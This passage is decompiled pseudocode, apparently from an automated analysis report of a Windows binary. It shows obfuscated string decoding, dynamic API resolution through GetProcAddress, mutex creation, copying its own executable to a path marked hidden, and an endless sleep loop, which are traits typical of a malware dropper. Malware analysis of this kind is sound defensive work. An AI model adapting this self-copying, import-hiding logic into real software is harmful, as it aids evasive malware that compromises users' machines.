				_t599 = E0038CF90(_t1521,  *0x3ce228 -  *0x3c75c8, 0xbd5, 5);
				E00396570(7, _t596);
				_t601 =  *0x3d048c; // 0x74160000
				 *0x3d0490 = GetProcAddress(_t601, _t599);
				_t603 = E0038CF90(_t1521,  *0x3ce228 -  *0x3c75c8, 0xe42, 0xb);
				E00396570(5, _t599);
				_t964 =  *0x3d048c; // 0x74160000
				 *0x3d0470 = GetProcAddress(_t964, _t603);
				_t606 = E0038CF90(_t1521,  *0x3ce228 -  *0x3c75c8, 0x2c83, 7);
				_t1243 = _t606;
				E00396570(0xb, _t603);
				_t1637 =  *0x3ce2a4 *  *0x3c8294;
				_t1124 =  *0x3d048c; // 0x74160000
				 *0x3ce2a4 = _t1637;
				 *0x3d0434 = GetProcAddress(_t1124, _t606);
				_t1334 = E0038CF90(_t1521, _t1637, 0x23d4, 0xd);
				_t610 =  *0x3ce298 & 0x0000ffff;
				_v8 = _t610 + 0x560a8809;
				_t1445 = _t1434 + 0xa8;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1637;
				_t1125 =  *0x3ce144; // 0x80fe1c2e
				 *0x3ce144 =  *0x3ce144 + 1;
				_v8 = _t1125;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				asm("fucompp");
				asm("fnstsw ax");
				_t1641 =  *0x3ce510 +  *0x3c75c8;
				 *0x3ce510 = _t1641;
				_t1522 = _t610 & 0x00000044;
				if((_t610 & 0x00000044) != 0) {
					_v20 =  *0x3ce348 +  *0x3c8290 -  *0x3c828c;
					_t1641 = _v20;
					asm("fucompp");
					asm("fnstsw ax");
					__eflags = _t610 & 0x00000044;
					if((_t610 & 0x00000044) == 0) {
						st0 =  *0x3ce1d8;
						_t1641 =  *0x3ce278;
						st0 = _t1641;
					}
				} else {
					 *0x3ce558 = ( *0x3ce318 & 0x0000ffff) - 0x6a11dab7;
				}
				E00396570(7, _t1243);
				_t612 = LoadLibraryA(_t1334);
				_t1126 =  *0x3ce2dc; // 0x14e81cf5
				_v8 = _t1126;
				asm("fild dword [ebp-0x4]");
				 *0x3d0310 = _t612;
				 *0x3ce110 = _t1641;
				_t613 = E0038CF90(_t1522, _t1641, 0xeb9, 0x14);
				E00396570(0xd, _t1334);
				_t615 =  *0x3d0310; // 0x76a00000
				 *0x3d0508 = GetProcAddress(_t615, _t613);
				 *0x3ce33c =  *0x3ce33c + 1;
				_t967 =  *0x3ce33c; // 0xc71f
				 *0x3ce298 = ( *0x3ce298 & 0x0000ffff) - _t967 + 0x196f2073;
				_t618 = E0038CF90(_t1522, _t1641, 0x1e18, 0xd);
				E00396570(0x14, _t613);
				 *0x3ce460 =  *0x3ce460 + 0x24af4e0a;
				_t620 =  *0x3d0310; // 0x76a00000
				 *0x3d04bc = GetProcAddress(_t620, _t618);
				_t622 = E0038CF90(_t1522, _t1641, 0x319f, 0xf);
				_t1245 = _t622;
				E00396570(0xd, _t618);
				_t968 =  *0x3d0310; // 0x76a00000
				 *0x3d04dc = GetProcAddress(_t968, _t622);
				_t625 = E0038CF90(_t1522, _t1641, 0xdff, 0x13);
				asm("fld1");
				_t1336 = _t625;
				_t1450 = _t1445 + 0x40;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce1d4 = st0;
				_v20 =  *0x3ce1d4;
				asm("fcompp");
				asm("fnstsw ax");
				_t1654 =  *0x3ce5e4 - st1;
				 *0x3ce5e4 = _t1654;
				_t1523 = _t625 & 0x00000005;
				if((_t625 & 0x00000005) != 0) {
					asm("fsubr dword [0x3ce4f8]");
					 *0x3ce4f8 = _t1654;
					_t1657 =  *0x3ce4f8 -  *0x3c8280;
					asm("fsubp st1, st0");
					 *0x3ce0d0 =  *0x3ce4f8 -  *0x3c8280;
				} else {
					 *0x3ce59c =  *0x3ce59c + 1;
					st0 = _t1654;
					st0 =  *0x3ce450;
					_t1657 =  *0x3ce15c;
					st0 =  *0x3ce15c;
				}
				E00396570(0xf, _t1245);
				_t627 =  *0x3d0310; // 0x76a00000
				 *0x3d0294 = GetProcAddress(_t627, _t1336);
				_t629 = E0038CF90(_t1523, _t1657, 0x2292, 0x11);
				E00396570(0x13, _t1336);
				_t969 =  *0x3d0310; // 0x76a00000
				 *0x3d04a8 = GetProcAddress(_t969, _t629);
				_t632 = E0038CF90(_t1523, _t1657, 0x3ebf, 0x1c);
				_t1337 = _t632;
				E00396570(0x11, _t629);
				_t1130 =  *0x3d0310; // 0x76a00000
				 *0x3d04f4 = GetProcAddress(_t1130, _t632);
				 *0x3ce270 =  *0x3ce270 -  *0x3c75c8;
				_t635 =  *0x3ce270; // 0x1918a56b
				_t970 =  *0x3ce274; // 0x435cdee1
				_v20 =  *0x3ce43c;
				_v12 = _t635;
				_v8 = _t970;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce43c =  *0x3ce2a0 + _v12 +  *0x3c8278;
				asm("fld1");
				asm("fsubp st1, st0");
				_t1247 = E0038CF90(_t1523,  *0x3ce2a0, 0x1003, 0x1c);
				asm("fld1");
				_t1454 = _t1450 + 0x30;
				_t1666 =  *0x3ce450 - st0;
				asm("fxch st0, st1");
				 *0x3ce450 = _t1666;
				_t1131 =  *0x3ce288; // 0x6ce1ec48
				_v8 = _t1131;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1666;
				_t1667 =  *0x3ce1f0;
				_t637 =  *0x3ce4a8; // 0x1d14
				asm("fsubr qword [ebp-0x10]");
				_v8 = _t637;
				_v28 = _t1667;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1667;
				 *0x3ce4a8 =  *0x3ce4a8 + 1;
				asm("fsubr qword [ebp-0x10]");
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t1670 =  *0x3ce1f0 + st1;
				 *0x3ce1f0 = _t1670;
				if((_t637 & 0x00000041) != 0) {
					st0 = _t1670;
				} else {
					asm("fsubr qword [0x3ce198]");
					 *0x3ce198 = _t1670;
					_t1197 =  *0x3ce1d0; // 0x2f751c97
					asm("fsubr qword [0x3c8270]");
					_v8 = _t1197;
					_v20 =  *0x3ce198;
					asm("fild dword [ebp-0x4]");
					 *0x3ce1d0 = E0039CABC();
				}
				E00396570(0x1c, _t1337);
				 *0x3ce0b8 =  *0x3ce0b8 - 1;
				_t1671 =  *0x3ce3bc;
				_t639 =  *0x3ce0b8; // 0xf45e
				_v20 = _t1671;
				_t1132 =  *0x3ce288; // 0x6ce1ec48
				_v8 = _t639;
				_t1455 = _t1454 + 8;
				asm("fild dword [ebp-0x4]");
				_v8 = _t1132;
				_t1673 = _t1671 + _v20 -  *0x3c8268;
				_v20 = _t1673;
				asm("fild dword [ebp-0x4]");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t1525 = _t639 & 0x00000005;
				if((_t639 & 0x00000005) == 0) {
					_t1673 =  *0x3ce3a0 -  *0x3c8260;
					 *0x3ce3a0 = _t1673;
				}
				_t640 =  *0x3d0310; // 0x76a00000
				 *0x3d0280 = GetProcAddress(_t640, _t1247);
				_t642 = E0038CF90(_t1525, _t1673, 0xb8, 0xf);
				E00396570(0x1c, _t1247);
				_t973 =  *0x3d0310; // 0x76a00000
				 *0x3d0750 = GetProcAddress(_t973, _t642);
				_t645 = E0038CF90(_t1525, _t1673, 0x1a31, 0x16);
				E00396570(0xf, _t642);
				_t1133 =  *0x3d0310; // 0x76a00000
				 *0x3d04e0 = GetProcAddress(_t1133, _t645);
				_t648 = E0038CF90(_t1525, _t1673, 0x145, 0xe);
				_t649 =  *0x3ce58c; // 0x7fffffff
				_v8 = 0x1ab700d7 - _t649;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1673;
				 *0x3ce170 =  *0x3ce170 + _v20;
				 *0x3ce58c =  *0x3ce58c - 1;
				E00396570(0x16, _t645);
				_t1134 =  *0x3d0310; // 0x76a00000
				 *0x3d04b4 = GetProcAddress(_t1134, _t648);
				_t652 = E0038CF90(_t1525,  *0x3ce170 + _v20, 0xf6a, 0xf);
				E00396570(0xe, _t648);
				_t654 =  *0x3d0310; // 0x76a00000
				 *0x3cfc94 = GetProcAddress(_t654, _t652);
				_t656 = E0038CF90(_t1525,  *0x3ce170 + _v20, 0xe4f, 0xe);
				_t1340 = _t656;
				E00396570(0xf, _t652);
				_t976 =  *0x3d0310; // 0x76a00000
				_t1460 = _t1455 + 0x50;
				_t658 = GetProcAddress(_t976, _t656);
				 *0x3cfb10 = _t658;
				_t1677 =  *0x3c8258 -  *0x3ce444;
				_t1135 =  *0x3ce3d0; // 0x399d3e12
				_v8 = _t1135;
				_v20 = _t1677;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0x10]");
				_v20 = _t1677;
				asm("fsubr qword [0x3c8250]");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t1680 =  *0x3ce220 +  *0x3c75c8;
				 *0x3ce220 = _t1680;
				 *0x3ce3d0 =  *0x3ce3d0 + 1;
				_t1526 = _t658 & 0x00000005;
				if((_t658 & 0x00000005) == 0) {
					_t889 =  *0x3ce0bc; // 0xdec
					_v8 = _t889;
					asm("fild dword [ebp-0x4]");
					_v28 = _t1680;
					_v20 =  *0x3ce0b0 -  *0x3c8248;
					asm("fsubr qword [ebp-0x18]");
					 *0x3ce0bc = E0039CABC();
					_t1680 =  *0x3ce0b0;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce0b0 = _t1680;
				}
				_t659 = E0038CF90(_t1526, _t1680, 0x1328, 0xe);
				_t1136 =  *0x3ce040; // 0x80000000
				_v8 = _t1136 - 0x25a37e67;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1680;
				_t1682 =  *0x3ce5c8 + _v20;
				 *0x3ce5c8 = _t1682;
				E00396570(0xe, _t1340);
				_t661 =  *0x3d0310; // 0x76a00000
				 *0x3d0304 = GetProcAddress(_t661, _t659);
				_t663 = E0038CF90(_t1526, _t1682, 0xfd4, 0xf);
				E00396570(0xe, _t659);
				_t977 =  *0x3d0310; // 0x76a00000
				 *0x3d0474 = GetProcAddress(_t977, _t663);
				_t666 = E0038CF90(_t1526, _t1682, 0x14ec, 0xe);
				E00396570(0xf, _t663);
				_t1138 =  *0x3d0310; // 0x76a00000
				 *0x3d0510 = GetProcAddress(_t1138, _t666);
				_t669 = E0038CF90(_t1526, _t1682, 0x3c0, 0x11);
				E00396570(0xe, _t666);
				_t671 =  *0x3d0310; // 0x76a00000
				 *0x3d0454 = GetProcAddress(_t671, _t669);
				_t1252 = E0038CF90(_t1526, _t1682, 0x223b, 0xc);
				E00396570(0x11, _t669);
				_t978 =  *0x3ce2ec; // 0x76d570f4
				_t1465 = _t1460 + 0x50;
				if(_t978 <= 0x6c5b8536) {
					_t1195 =  *0x3ce588; // 0xb5d5
					_t1068 =  *0x3ce5b4; // 0x1cd4718b
					 *0x3ce5b4 =  *0x3ce5b4 - 1;
					_t1528 = _t1195 + 0x6ba0011b - _t1068 - 0x4da818f6;
					if(_t1195 + 0x6ba0011b <= _t1068 - 0x4da818f6) {
						_t1196 =  *0x3ce128; // 0x206a
						_v8 = _t1196;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1682;
						_t1070 =  *0x3ce378; // 0x1dce930
						_v8 = _t1070;
						_v20 =  *0x3ce490 + _v20 +  *0x3c8240;
						asm("fild dword [ebp-0x4]");
						 *0x3ce378 = E0039CABC();
						_t1682 =  *0x3ce490 -  *0x3c75c8;
						 *0x3ce490 = _t1682;
					}
				}
				_t1139 =  *0x3d0310; // 0x76a00000
				 *0x3d0324 = GetProcAddress(_t1139, _t1252);
				_t676 = E0038CF90(_t1528, _t1682, 0xfc6, 0xc);
				E00396570(0xc, _t1252);
				_t678 =  *0x3d0310; // 0x76a00000
				 *0x3d02d8 = GetProcAddress(_t678, _t676);
				 *0x3ce020 = 0x2462;
				_t680 = E0038CF90(_t1528, _t1682, 0x3edd, 0x19);
				E00396570(0xc, _t676);
				_t1140 =  *0x3d0310; // 0x76a00000
				 *0x3d0504 = GetProcAddress(_t1140, _t680);
				_t683 = E0038CF90(_t1528, _t1682, 0x3188, 0x15);
				E00396570(0x19, _t680);
				_t685 =  *0x3d0310; // 0x76a00000
				 *0x3d02ec = GetProcAddress(_t685, _t683);
				_t687 = E0038CF90(_t1528, _t1682, 0x14e2, 8);
				E00396570(0x15, _t683);
				_t980 =  *0x3d0310; // 0x76a00000
				 *0x3d02e0 = GetProcAddress(_t980, _t687);
				_t690 = E0038CF90(_t1528, _t1682, 0x108, 0x11);
				_t1345 = _t690;
				E00396570(8, _t687);
				_t1141 =  *0x3d0310; // 0x76a00000
				 *0x3d02dc = GetProcAddress(_t1141, _t690);
				_t1255 = E0038CF90(_t1528, _t1682, 0x39b, 0x11);
				_t694 =  *0x3ce458; // 0x5bdf
				_v8 = _t694;
				_t1471 = _t1465 + 0x58;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1682;
				 *0x3ce458 =  *0x3ce458 - 1;
				asm("fcomp qword [0x3c8230]");
				asm("fnstsw ax");
				asm("fld1");
				_t1687 =  *0x3ce358 - st0;
				asm("fxch st0, st1");
				 *0x3ce358 = _t1687;
				if((_t694 & 0x00000005) != 0) {
					st0 = _t1687;
				} else {
					_t1761 = _t1687 +  *0x3ce450;
					 *0x3ce450 = _t1761;
					_t1194 =  *0x3ce0ec; // 0x2a1f8050
					_v8 = _t1194;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1761;
					asm("fcomp qword [0x3c8220]");
					asm("fnstsw ax");
					_t1530 = _t694 & 0x00000041;
					if((_t694 & 0x00000041) == 0) {
						 *0x3ce608 =  *0x3ce608 - 1;
						_t884 =  *0x3ce608; // 0x3cd9
						 *0x3ce398 = _t884;
					}
				}
				E00396570(0x11, _t1345);
				_t982 =  *0x3ce478; // 0x80000000
				_v8 = _t982;
				_v20 =  *0x3ce5b0 +  *0x3c821c;
				asm("fild dword [ebp-0x4]");
				 *0x3ce478 = E0039CABC();
				asm("fld1");
				_t1142 =  *0x3d0310; // 0x76a00000
				asm("faddp st1, st0");
				 *0x3d045c = GetProcAddress(_t1142, _t1255);
				_t698 = E0038CF90(_t1530,  *0x3ce5b0, 0x37ca, 0x16);
				E00396570(0x11, _t1255);
				_t700 =  *0x3d0310; // 0x76a00000
				 *0x3cfc24 = GetProcAddress(_t700, _t698);
				_t702 = E0038CF90(_t1530,  *0x3ce5b0, 0x3e03, 0x15);
				_t1256 = _t702;
				E00396570(0x16, _t698);
				_t983 =  *0x3d0310; // 0x76a00000
				 *0x3d027c = GetProcAddress(_t983, _t702);
				E00390530(E00396570(0x15, _t702));
				_t707 = E0038CF90(_t1530,  *0x3ce5b0, 0x2877, 0xc);
				_v20 =  *0x3ce1a4;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce1a4 =  *0x3ce584;
				asm("fld1");
				asm("faddp st1, st0");
				GetEnvironmentVariableA(_t707, "C:\\Users\\hardz", 0x104);
				E00396570(0xc, _t707);
				_t1476 = _t1471 + 0x40;
				_t710 = CreateMutexA(0, 0, 0); // executed
				 *0x3d04d0 = _t710;
				 *0x3cfb1c = 1;
				_t711 = CreateMutexA(0, 0, 0); // executed
				 *0x3d0284 = _t711;
				 *0x3ce47c =  *0x3ce47c + 1;
				_t1695 =  *0x3ce0a0;
				_t1143 =  *0x3ce308; // 0x7f16f77b
				_v20 = _t1695;
				_t712 =  *0x3ce47c; // 0xd2bf0292
				_v8 = _t1143;
				asm("fild dword [ebp-0x4]");
				_v8 = _t712;
				asm("fsubr qword [ebp-0x10]");
				_t1696 = _t1695 -  *0x3c8218;
				_v28 = _t1696;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1696;
				 *0x3ce308 =  *0x3ce308 + 1;
				_t1698 =  *0x3ce0f4 + _v20;
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t1531 = _t712 & 0x00000041;
				if((_t712 & 0x00000041) == 0) {
					_t1067 =  *0x3ce1e8; // 0xa3c3
					_t1143 = _t1067;
					_v8 = _t1067;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1698;
					_t1698 =  *0x3ce050 * _v20;
					 *0x3ce050 = _t1698;
				}
				_t713 = CreateMutexA(0, 0, 0);
				_push(0x10);
				 *0x3d0758 = _t713;
				_t714 = E0039D76C(_t1143, _t1256, 1, _t1531);
				_t1477 = _t1476 + 4;
				if(_t714 == 0) {
					 *0x3d04a4 = 0;
				} else {
					 *0x3d04a4 = E00398230(_t714);
				}
				_t715 =  *0x3ce55c; // 0x0
				_v8 = _t715;
				 *0x3cfb04 = 0x708;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1698;
				_t1700 =  *0x3ce2d0 * _v20;
				 *0x3ce55c = E0039CABC();
				_t717 =  *0x3cfc74; // 0x2d811b0
				if( *_t717 != 0) {
					L49:
					E003852E0(_t1700); // executed
					_t985 =  *0x3ce00c; // 0x640f69c6
					_v8 = _t985 - 0x276f6dab;
					asm("fild dword [ebp-0x4]");
					asm("fsubp st1, st0");
					 *0x3ce00c =  *0x3ce00c + 1;
					_t719 = GetCommandLineA();
					_t1145 =  &_v644 - _t719;
					_v20 =  *0x3ce360 -  *0x3ce3c0;
					 *0x3ce260 =  *0x3ce260 + _v20;
					asm("fld1");
					_t1707 =  *0x3ce3c0 - st0;
					asm("fxch st0, st1");
					 *0x3ce3c0 = _t1707;
					_t1708 = _t1707 +  *0x3ce360;
					 *0x3ce360 = _t1708;
					do {
						_t987 =  *_t719;
						 *((char*)(_t1145 + _t719)) = _t987;
						_t719 =  &(_t719[1]);
						_t1540 = _t987;
					} while (_t987 != 0);
					_t1349 = E0038CF90(_t1540, _t1708, 0x159f, 0x1f);
					_t1257 = E00396AA0( &_v644, _t720);
					E00396570(0x1f, _t720);
					_t1478 = _t1477 + 0x18;
					_t1541 = _t1257;
					if(_t1257 == 0) {
						L90:
						_t724 = E00394820(GetCommandLineA());
						_t1479 = _t1478 + 4;
						_t1148 =  &_v644 - _t724;
						__eflags = _t1148;
						do {
							_t988 =  *_t724;
							 *((char*)(_t724 + _t1148)) = _t988;
							_t724 = _t724 + 1;
							__eflags = _t988;
						} while (_t988 != 0);
						_v644 = _t988;
						GetModuleFileNameA(0,  &_v644, 0x200);
						E003C2BB6( &_v644);
						_t728 =  *0x3d0494; // 0x2d81088
						_t1480 = _t1479 + 4;
						_t1150 =  &_v108 - _t728;
						__eflags = _t1150;
						do {
							_t990 =  *_t728;
							 *((char*)(_t728 + _t1150)) = _t990;
							_t728 = _t728 + 1;
							__eflags = _t990;
						} while (_t990 != 0);
						_t729 =  *0x3d031c; // 0x2d810d8
						_t1152 =  &_v132 - _t729;
						__eflags = _t1152;
						do {
							_t991 =  *_t729;
							 *((char*)(_t729 + _t1152)) = _t991;
							_t729 = _t729 + 1;
							__eflags = _t991;
						} while (_t991 != 0);
						E003C2BB6( &_v108);
						E003C2BB6( &_v132);
						_t1481 = _t1480 + 8;
						__eflags =  *0x3d02d4;
						if(__eflags != 0) {
							L104:
							_t1154 =  &_v644;
							_push(_t1154);
							_t733 = E0038DB70(__eflags, _t1708);
							_t1482 = _t1481 + 4;
							__eflags = _t733 - 1;
							if(__eflags > 0) {
								asm("fld1");
								asm("faddp st2, st0");
								asm("fxch st0, st1");
								 *0x3ce488 = st0;
								_v20 =  *0x3ce488;
								_t1708 =  *0x3ce39c;
								_t802 =  *0x3ce140; // 0x5ea6
								asm("fsubr qword [ebp-0x10]");
								_v8 = _t802;
								_v20 = _t1708;
								asm("fild dword [ebp-0x4]");
								asm("fsubr qword [ebp-0x10]");
								 *0x3ce4c4 = E0039CABC();
								asm("fsubr dword [0x3ce39c]");
								 *0x3ce39c = _t1708;
								E0039DF62(0);
							}
							E00395410(_t1257, _t1349, __eflags, _t1708);
							_v20 =  *0x3ce5e4 -  *0x3c81d4;
							_t1712 =  *0x3ce590 + _v20;
							 *0x3ce590 = _t1712;
							_t736 = E0039B950(0);
							 *0x3d04cc = _t1154;
							 *0x3d04c8 = _t736;
							E00386790( &_v1412);
							_t1483 = _t1482 + 4;
							_t738 = 0;
							__eflags = 0;
							do {
								_t992 =  *((intOrPtr*)(_t1363 + _t738 - 0x580));
								 *((char*)(_t738 + 0x3cfca0)) = _t992;
								_t738 = _t738 + 1;
								__eflags = _t992;
							} while (_t992 != 0);
							_t739 =  *0x3d04b0; // 0x2d81180
							_t993 = _t739;
							do {
								_t1156 =  *_t739;
								_t739 = _t739 + 1;
								__eflags = _t1156;
							} while (_t1156 != 0);
							_t740 = _t739 - _t993;
							_t1350 = _t993;
							_t1259 = 0x3cfc9f;
							__eflags = 0x3cfca0;
							do {
								_t269 = _t1259 + 1; // 0x0
								_t1259 = _t1259 + 1;
								__eflags =  *_t269;
							} while ( *_t269 != 0);
							_t996 = _t740 >> 2;
							_t999 = memcpy(_t1259, _t1350, _t996 << 2) & 0x00000003;
							__eflags = _t999;
							_t743 = memcpy(_t1350 + _t996 + _t996, _t1350, _t999);
							_t1485 = _t1483 + 0x18;
							_t1001 = _t743;
							do {
								_t1157 =  *_t743;
								_t743 = _t743 + 1;
								__eflags = _t1157;
							} while (_t1157 != 0);
							_t744 = _t743 - _t1001;
							_t1351 = _t1001;
							_t1265 =  &_v1412 - 1;
							__eflags = _t1265;
							do {
								_t1002 =  *(_t1265 + 1);
								_t1265 = _t1265 + 1;
								__eflags = _t1002;
							} while (_t1002 != 0);
							_t1004 = _t744 >> 2;
							_t745 = memcpy(_t1265, _t1351, _t1004 << 2);
							_t1007 = _t745 & 0x00000003;
							memcpy(_t1351 + _t1004 + _t1004, _t1351, _t1007);
							_t1487 = _t1485 + 0x18;
							_t1269 = _t1351 + _t1007 + _t1007;
							__eflags =  *0x3d02e8(0x202,  &_v1812);
							if(__eflags != 0) {
								_t800 = E0038CF90(__eflags, _t1712, 0x382b, 0xb);
								_t1487 = _t1487 + 8;
								_push(_t800);
								E00392CC0();
							}
							_t1009 =  *0x3d050c; // 0x2d81058
							_t1158 =  &_v644;
							_t749 = E00396AA0( &_v644, _t1009);
							_t1488 = _t1487 + 8;
							__eflags = _t749;
							if(__eflags == 0) {
								_v20 =  *0x3ce074;
								asm("fsubr qword [ebp-0x10]");
								asm("fsubp st1, st0");
								 *0x3ce1b8 =  *0x3ce000;
								_t1722 =  *0x3ce074;
								asm("fld1");
								asm("fsubp st1, st0");
								_t797 = E00396710(_t909, _t1269, _t1351, __eflags);
								__eflags = _t797;
								if(_t797 == 0) {
									E0039DF62(_t797);
								}
								E00384510(_t1158, _t1722);
								_v20 =  *0x3ce0a4;
								_t1712 =  *0x3ce490;
								asm("fsubr qword [ebp-0x10]");
								 *0x3ce0a4 = _t1712;
							}
							_t750 =  *0x3ce180; // 0x7246
							_v8 = 0xc122fa40 - _t750;
							asm("fild dword [ebp-0x4]");
							 *0x3ce510 = _t1712;
							 *0x3ce180 =  *0x3ce180 + 1;
							_t751 =  *0x3d050c; // 0x2d81058
							_t752 = E00396AA0( &_v644, _t751);
							_t1489 = _t1488 + 8;
							__eflags = _t752;
							if(_t752 != 0) {
								L130:
								_t1352 = 0;
								__eflags = 0;
								while(1) {
									_t1161 =  *0x3ce020; // 0x829
									_v8 = _t1161;
									asm("fild dword [ebp-0x4]");
									_v20 = _t1712;
									_t1012 =  *0x3d04b0; // 0x2d81180
									_t1712 =  *0x3ce200 + _v20;
									 *0x3ce200 = _t1712;
									_t754 = E00392E30(_t1012);
									_t1490 = _t1489 + 4;
									__eflags = _t754;
									if(__eflags == 0) {
										break;
									}
									_t1169 =  *0x3d04b0; // 0x2d81180
									E003896D0(_t1352, _t1169);
									_t1489 = _t1490 + 4;
									Sleep(0x7d0);
									_t1352 = _t1352 + 1;
									__eflags = _t1352 - 0xa;
									if(__eflags < 0) {
										continue;
									}
									break;
								}
								SetFileAttributesA(0x3cfca0, 0x80);
								CopyFileA( &_v644, 0x3cfca0, 0);
								SetFileAttributesA(0x3cfca0, 2);
								E00396330(__eflags,  &_v1412);
								_t760 = E0038CF90(__eflags, _t1712, 0x30b4, 0x1f);
								_t910 = _t760;
								_t1014 = _t760;
								do {
									_t1162 =  *_t760;
									_t760 = _t760 + 1;
									__eflags = _t1162;
								} while (_t1162 != 0);
								_t761 = _t760 - _t1014;
								_t1353 = _t1014;
								_t1271 =  &_v1412 - 1;
								__eflags = _t1271;
								do {
									_t1015 =  *(_t1271 + 1);
									_t1271 = _t1271 + 1;
									__eflags = _t1015;
								} while (__eflags != 0);
								_t1017 = _t761 >> 2;
								_t1020 = memcpy(_t1271, _t1353, _t1017 << 2) & 0x00000003;
								memcpy(_t1353 + _t1017 + _t1017, _t1353, _t1020);
								_t1275 = _t1353 + _t1020 + _t1020;
								_t764 = E0038CF90(__eflags, _t1712, 0x29a1, 3);
								E00396570(0x1f, _t910);
								E0039D699( &_v1412, _t764);
								E00396570(3, _t764);
								_t768 =  *0x3ce51c; // 0xaae
								_t1715 =  *0x3ce520 -  *0x3c81d0;
								_v8 = _t768;
								_v20 = _t1715;
								asm("fild dword [ebp-0x4]");
								asm("fcomp qword [ebp-0x10]");
								asm("fnstsw ax");
								__eflags = _t768 & 0x00000005;
								if((_t768 & 0x00000005) == 0) {
									_t1715 =  *0x3ce5b8 -  *0x3c81c8;
									 *0x3ce5b8 = _t1715;
								}
								_t1164 =  *0x3cfb04; // 0x708
								_push(_t1164);
								E00389970(_t910, _t1275,  &_v1412);
								_t771 = E0038CF90(__eflags, _t1715, 0x3f8d, 8);
								_t772 = E0038CF90(__eflags, _t1715, 0x159f, 0x1f);
								_t1023 =  *0x3ce2fc; // 0x3a84af9e
								_v8 = _t1023 + 0x1b342e2e;
								asm("fild dword [ebp-0x4]");
								_push( &_v644);
								_v20 = _t1715;
								 *0x3ce0a0 =  *0x3ce0a0 + _v20;
								 *0x3ce2fc =  *0x3ce2fc - 1;
								E0039E0C2(0x3d0518, 0x21c, _t771, _t772);
								E00396570(8, _t771);
								E00396570(0x1f, _t772);
								E00386260( *0x3ce0a0 + _v20, 0x3cfca0, 0x3d0518);
								E0039C990( &_v644, 0, 0x200);
								E0039C990( &_v1412, 0, 0x300);
								_t780 = CreateThread(0, 0, E0038BFF0, 0, 0, 0);
								__eflags =  *0x3d030c;
								 *0x3d047c = _t780;
								if( *0x3d030c != 0) {
									_t1166 =  *0x3ce598; // 0xc37b
									_t1167 =  *0x3ce264; // 0x80000000
									_t1168 = _t1167 + 0x85983389 - _t1166;
									__eflags = _t1168;
									 *0x3ce558 = _t1168;
									E0038CDB0();
								}
								L141:
								Sleep(0xc350);
								goto L141;
							} else {
								_t1170 =  *0x3cfc7c; // 0x0
								CloseHandle(_t1170);
								SetFileAttributesA( &_v1412, 0x80);
								_t788 = CopyFileA( &_v644,  &_v1412, 0);
								__eflags = _t788;
								if(_t788 == 0) {
									L129:
									_t1028 =  *0x3d0284; // 0x490
									E0038F090(_t1712, _t1028);
									_t1489 = _t1489 + 4;
									E0039DF62(0);
									goto L130;
								}
								_t792 = SetFileAttributesA( &_v1412, 2);
								__eflags =  *0x3d030c;
								if( *0x3d030c == 0) {
									L127:
									E00386A90( &_v1412);
									_t1497 = _t1489 + 4;
									L128:
									Sleep(0x3e8);
									E00386260(_t1712,  &_v1412, 0);
									_t1489 = _t1497 + 8;
									goto L129;
								}
								E0039B350(_t792,  &_v1412);
								_t1489 = _t1489 + 4;
								__eflags =  *0x3d030c;
								if( *0x3d030c == 0) {
									goto L127;
								}
								__eflags =  *0x3d076c - 6;
								if( *0x3d076c >= 6) {
									goto L128;
								}
								goto L127;
							}
						}
						_t1031 =  *0x3d050c; // 0x2d81058
						_t805 = E00396AA0( &_v644, _t1031);
						_t1481 = _t1481 + 8;
						__eflags = _t805;
						if(__eflags != 0) {
							goto L104;
						}
						_t807 = E00396AA0( &_v644,  &_v108);
						_t1481 = _t1481 + 8;
						__eflags = _t807;
						if(__eflags != 0) {
							goto L104;
						}
						_t809 = E00396AA0( &_v644,  &_v132);
						_t1481 = _t1481 + 8;
						__eflags = _t809;
						if(__eflags != 0) {
							goto L104;
						}
						E00384070(_t1708,  &_v644, _v32); // executed
						_t1498 = _t1481 + 8; // executed
						E0038D840(_t1708); // executed
						__eflags =  *0x3d02e4;
						if(__eflags == 0) {
							L53:
							E0039DF62(0);
							L54:
							_t909 =  &(_t909[1]);
							_t1277 = E00396AA0(_t909, E0038CF90(_t1542, _t1708, 0x1593, 2));
							E00396570(2, _t813);
							_t1499 = _t1498 + 0x18;
							_t1543 = _t1277;
							if(_t1277 == 0) {
								E0039DF62(_t1277);
							}
							 *_t1277 = 0;
							_t816 = E00396330(_t1543,  &_v1412);
							_t1176 =  *0x3ce00c; // 0x640f69c6
							_v8 = _t1176;
							asm("fild dword [ebp-0x4]");
							_t1500 = _t1499 + 4;
							_v20 = _t1708;
							asm("fucompp");
							asm("fnstsw ax");
							_t1730 =  *0x3ce540;
							asm("fld1");
							asm("faddp st1, st0");
							_t1544 = _t816 & 0x00000044;
							if((_t816 & 0x00000044) == 0) {
								_t853 =  *0x3ce1c0; // 0xa815
								_v8 = _t853;
								_t1752 =  *0x3ce354 +  *0x3c820c -  *0x3c8208;
								_v20 = _t1752;
								asm("fild dword [ebp-0x4]");
								_t1730 = _t1752 + _v20;
								 *0x3ce1c0 = E0039CABC();
							}
							_t1035 = E0038CF90(_t1544, _t1730, 0x30b4, 0x1f);
							_t1501 = _t1500 + 8;
							_t1357 = _t1035;
							do {
								_t1177 =  *_t1035;
								_t1035 = _t1035 + 1;
							} while (_t1177 != 0);
							_t1178 = _t1035 - _t1357;
							_t1279 =  &_v1412 - 1;
							do {
								_t1037 =  *(_t1279 + 1);
								_t1279 = _t1279 + 1;
							} while (_t1037 != 0);
							_t1039 = _t1178 >> 2;
